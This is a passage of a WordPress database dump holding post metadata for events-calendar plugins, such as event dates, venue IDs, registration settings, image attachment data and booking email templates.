3:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130701,263643,'_EventOrigin','events-calendar'),(130702,263643,'_EventOrigin','events-calendar'),(130703,263643,'_EventOrigin','events-calendar'),(130704,263643,'_EventOrigin','events-calendar'),(130705,263643,'_EventOrigin','events-calendar'),(130706,263643,'_EventOrigin','events-calendar'),(130707,263643,'_EventOrigin','events-calendar'),(130708,263643,'_EventOrigin','events-calendar'),(130709,263643,'_EventOrigin','events-calendar'),(130710,263643,'_EventOrigin','events-calendar'),(130711,263643,'_thumbnail_id','263644'),(130700,263643,'_EventOrigin','events-calendar'),(130730,263643,'_RTEClimitRegistrations','0'),(130731,263643,'_RTECmaxRegistrations','30'),(130732,263643,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130733,263643,'_RTECnumRegistered','0'),(130734,263643,'_EventVenueID','262435'),(130736,263643,'_dp_original','263641'),(130737,263643,'_edit_lock','1612025956:2'),(130738,263643,'_edit_last','2'),(130739,263644,'_wp_attached_file','2021/01/3-young-people-smiling.jpg'),(130740,263644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:34:\"2021/01/3-young-people-smiling.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"3-young-people-smiling-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"3-young-people-smiling-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"3-young-people-smiling-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145163,265425,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(159499,265425,'boldgrid_in_page_containers','1'),(159503,266545,'mec_color',''),(159504,266545,'mec_location_id','118'),(159505,266545,'mec_dont_show_map','0'),(145162,265425,'mec_display_cancellation_reason_in_single_page',''),(145161,265425,'mec_cancelled_reason',''),(145160,265425,'mec_moved_online_link',''),(145159,265425,'mec_event_status','EventScheduled'),(145158,265425,'mec_fields','a:0:{}'),(145157,265425,'mec_bfixed_fields','a:0:{}'),(145156,265425,'mec_public','1'),(145155,265425,'mec_countdown_method','global'),(145154,265425,'mec_timezone','global'),(145153,265425,'one_occurrence','0'),(145152,265425,'mec_additional_location_ids','a:0:{}'),(145151,265425,'mec_additional_organizer_ids','a:0:{}'),(145150,265425,'mec_currency','a:0:{}'),(145149,265425,'mec_cost',''),(145148,265425,'mec_more_info_target','_self'),(130767,263648,'protect_children',''),(130768,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130769,263648,'_EventOrigin','events-calendar'),(130770,263648,'protect_children',''),(130771,263648,'protect_children',''),(130772,263648,'protect_children',''),(130773,263648,'protect_children',''),(130774,263648,'protect_children',''),(130775,263648,'protect_children',''),(130776,263648,'protect_children',''),(130777,263648,'protect_children',''),(130778,263648,'protect_children',''),(130779,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130811,263648,'_EventCurrencyPosition','prefix'),(130780,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130810,263648,'_EventCurrencySymbol',''),(130781,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130809,263648,'_EventDuration','3600'),(130812,263648,'_EventCost',''),(130782,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130808,263648,'_EventEndDateUTC','2021-02-04 03:00:00'),(130783,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130807,263648,'_EventStartDateUTC','2021-02-04 02:00:00'),(130813,263648,'_EventURL',''),(130784,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130806,263648,'_EventEndDate','2021-02-03 20:00:00'),(130814,263648,'_EventTimezone','America/Denver'),(130785,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130805,263648,'_EventStartDate','2021-02-03 19:00:00'),(130815,263648,'_EventTimezoneAbbr','MST'),(130786,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130804,263648,'_EventShowMap',''),(130816,263648,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(130787,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130803,263648,'_EventShowMapLink',''),(130817,263648,'_RTECregistrationsDisabled','1'),(130818,263648,'_RTECdeadlineType','start'),(130788,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130802,263648,'boldgrid_hide_page_title','0'),(130819,263648,'_RTECwhoCanRegister','any'),(130789,263648,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1612000905;s:12:\"_EventOrigin\";i:1612000905;s:13:\"_thumbnail_id\";i:1612001420;s:24:\"boldgrid_hide_page_title\";i:1612000905;s:17:\"_EventShowMapLink\";i:1612000905;s:13:\"_EventShowMap\";i:1612000905;s:15:\"_EventStartDate\";i:1612001420;s:13:\"_EventEndDate\";i:1612001420;s:18:\"_EventStartDateUTC\";i:1612001420;s:16:\"_EventEndDateUTC\";i:1612001420;s:14:\"_EventDuration\";i:1612000905;s:20:\"_EventCurrencySymbol\";i:1612000905;s:22:\"_EventCurrencyPosition\";i:1612000905;s:10:\"_EventCost\";i:1612000905;s:9:\"_EventURL\";i:1612000905;s:14:\"_EventTimezone\";i:1612000905;s:18:\"_EventTimezoneAbbr\";i:1612000905;s:27:\"_EventNextPendingRecurrence\";i:1612000905;s:26:\"_RTECregistrationsDisabled\";i:1612000905;s:17:\"_RTECdeadlineType\";i:1612000905;s:19:\"_RTECwhoCanRegister\";i:1612000905;s:23:\"_RTEClimitRegistrations\";i:1612000905;s:21:\"_RTECmaxRegistrations\";i:1612000905;s:16:\"_EventRecurrence\";i:1612000905;s:18:\"_RTECnumRegistered\";i:1612000905;s:13:\"_EventVenueID\";i:1612000905;s:12:\"_dp_original\";i:1612000905;s:10:\"_edit_last\";i:1612000978;s:10:\"post_title\";i:1612001924;s:12:\"post_content\";i:1612002219;s:16:\"tribe_events_cat\";i:1612027419;s:11:\"post_status\";i:1612001420;}'),(130791,263648,'_EventOrigin','events-calendar'),(130792,263648,'_EventOrigin','events-calendar'),(130793,263648,'_EventOrigin','events-calendar'),(130794,263648,'_EventOrigin','events-calendar'),(130795,263648,'_EventOrigin','events-calendar'),(130796,263648,'_EventOrigin','events-calendar'),(130797,263648,'_EventOrigin','events-calendar'),(130798,263648,'_EventOrigin','events-calendar'),(130799,263648,'_EventOrigin','events-calendar'),(130800,263648,'_EventOrigin','events-calendar'),(130801,263648,'_thumbnail_id','263649'),(130790,263648,'_EventOrigin','events-calendar'),(130820,263648,'_RTEClimitRegistrations','0'),(130821,263648,'_RTECmaxRegistrations','30'),(130822,263648,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130823,263648,'_RTECnumRegistered','0'),(130824,263648,'_EventVenueID','262435'),(130826,263648,'_dp_original','263641'),(130827,263648,'_edit_lock','1612027860:2'),(130828,263648,'_edit_last','2'),(130829,263649,'_wp_attached_file','2021/01/seeker-in-the-light-1.jpg'),(130830,263649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:479;s:6:\"height\";i:267;s:4:\"file\";s:33:\"2021/01/seeker-in-the-light-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"seeker-in-the-light-1-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"seeker-in-the-light-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"seeker-in-the-light-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(145147,265425,'mec_more_info_title',''),(145146,265425,'mec_more_info',''),(145145,265425,'mec_read_more',''),(151854,266081,'boldgrid_hide_page_title','0'),(145143,265425,'_edit_last','2'),(145142,265425,'_edit_lock','1693507506:2'),(145141,265425,'mec_event_date_submit','20210422105713'),(145140,265425,'mec_op','a:0:{}'),(145139,265425,'mec_reg_fields','a:0:{}'),(145138,265425,'mec_reg_fields_global_inheritance','1'),(145137,265425,'mec_ticket_variations','a:0:{}'),(145136,265425,'mec_ticket_variations_global_inheritance','1'),(145135,265425,'mec_fees','a:0:{}'),(145134,265425,'mec_fees_global_inheritance','1'),(145133,265425,'mec_tickets','a:0:{}'),(145132,265425,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190568,265919,'mec_banner','a:0:{}'),(145131,265425,'mec_hourly_schedules','a:0:{}'),(145130,265425,'mec_not_in_days',''),(145129,265425,'mec_in_days',''),(145066,265363,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:409;s:6:\"height\";i:273;s:4:\"file\";s:32:\"2021/08/elss-child-flowers-2.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-300x273.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-300x273.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"elss-child-flowers-2-409x250.jpg\";s:5:\"width\";i: